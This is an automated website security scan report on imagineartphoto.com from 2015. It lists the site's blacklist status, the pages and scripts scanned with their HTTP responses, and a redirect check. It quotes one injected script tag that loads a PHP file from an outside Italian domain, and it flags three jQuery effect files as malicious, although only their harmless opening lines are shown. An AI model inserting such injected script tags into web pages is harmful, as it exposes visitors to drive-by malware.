Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=imagineartphoto.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://imagineartphoto.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 11:30:09 GMT Location: http://www.imagineartphoto.com/ Server: nginx/1.6.2 Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.imagineartphoto.com/ | 200 OK Content-Length: 8181 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.vannifornasiero.it/PWrmL3DJ.php?id=47977254"></script> | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js | 200 OK Content-Length: 77746 Content-Type: text/javascript | clean |
http://imagineartphoto.com/js/effects.core.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 11:30:11 GMT Location: http://www.imagineartphoto.com/js/effects.core.js Server: nginx/1.6.2 Content-Length: 326 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.imagineartphoto.com/js/effects.core.js | 200 OK Content-Length: 20004 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { $.effects = $.effects || {}; $.extend($.effects, { save: function(el, set) { for(var i=0;i<set.length;i ) { if(set[i] !== null) $.data(el[0], "ec.storage." set[i], el[0].style[set[i]]); } }, restore: function(el, set) { for(var i=0;i<set.length;i ) { if(set[i] !== null) el.css(set[i], $.data(el[0], "ec.storage." set[i])); } }, setMode: function(el, mode) { if (mode == 'toggle') mode = el.is(':hi Antivirus reports:
| ||
http://imagineartphoto.com/js/effects.slide.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 11:30:12 GMT Location: http://www.imagineartphoto.com/js/effects.slide.js Server: nginx/1.6.2 Content-Length: 327 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.imagineartphoto.com/js/effects.slide.js | 200 OK Content-Length: 3620 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.effects.slide = function(o) { return this.queue(function() { var el = $(this), props = ['position','top','left']; var mode = $.effects.setMode(el, o.options.mode || 'show'); var direction = o.options.direction || 'left'; $.effects.save(el, props); el.show(); $.effects.createWrapper(el).css({overflow:'hidden'}); var ref = (direction == 'up' || direction == 'down') ? 'top' : 'left'; var motion = (direction == 'up' || direction Antivirus reports:
| ||
http://imagineartphoto.com/supersized.3.0.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 11:30:13 GMT Location: http://www.imagineartphoto.com/supersized.3.0.js Server: nginx/1.6.2 Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.imagineartphoto.com/supersized.3.0.js | 200 OK Content-Length: 15908 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){ $.fn.supersized = function() { $.inAnimation = false; $.paused = false; var options = $.extend($.fn.supersized.defaults, $.fn.supersized.options); $.currentSlide = options.start_slide - 1; var imageLink = (options.slides[options.slides.length - 1].url) ? "href='" options.slides[options.slides.length - 1].url "'" : ""; $("<img/>").attr("src", options.slides[options.slides.length - 1].image).appe Antivirus reports:
| ||
http://imagineartphoto.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 11:30:14 GMT Location: http://www.imagineartphoto.com/test404page.js Server: nginx/1.6.2 Content-Length: 322 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.imagineartphoto.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://imagineartphoto.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: imagineartphoto.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 11:30:09 GMT
Location: http://www.imagineartphoto.com/
Server: nginx/1.6.2
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
...308 bytes of data.
GET / HTTP/1.1
Host: imagineartphoto.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 11:30:09 GMT
Location: http://www.imagineartphoto.com/
Server: nginx/1.6.2
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
...308 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: imagineartphoto.com
Referer: http://www.google.com/search?q=imagineartphoto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: imagineartphoto.com
Referer: http://www.google.com/search?q=imagineartphoto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.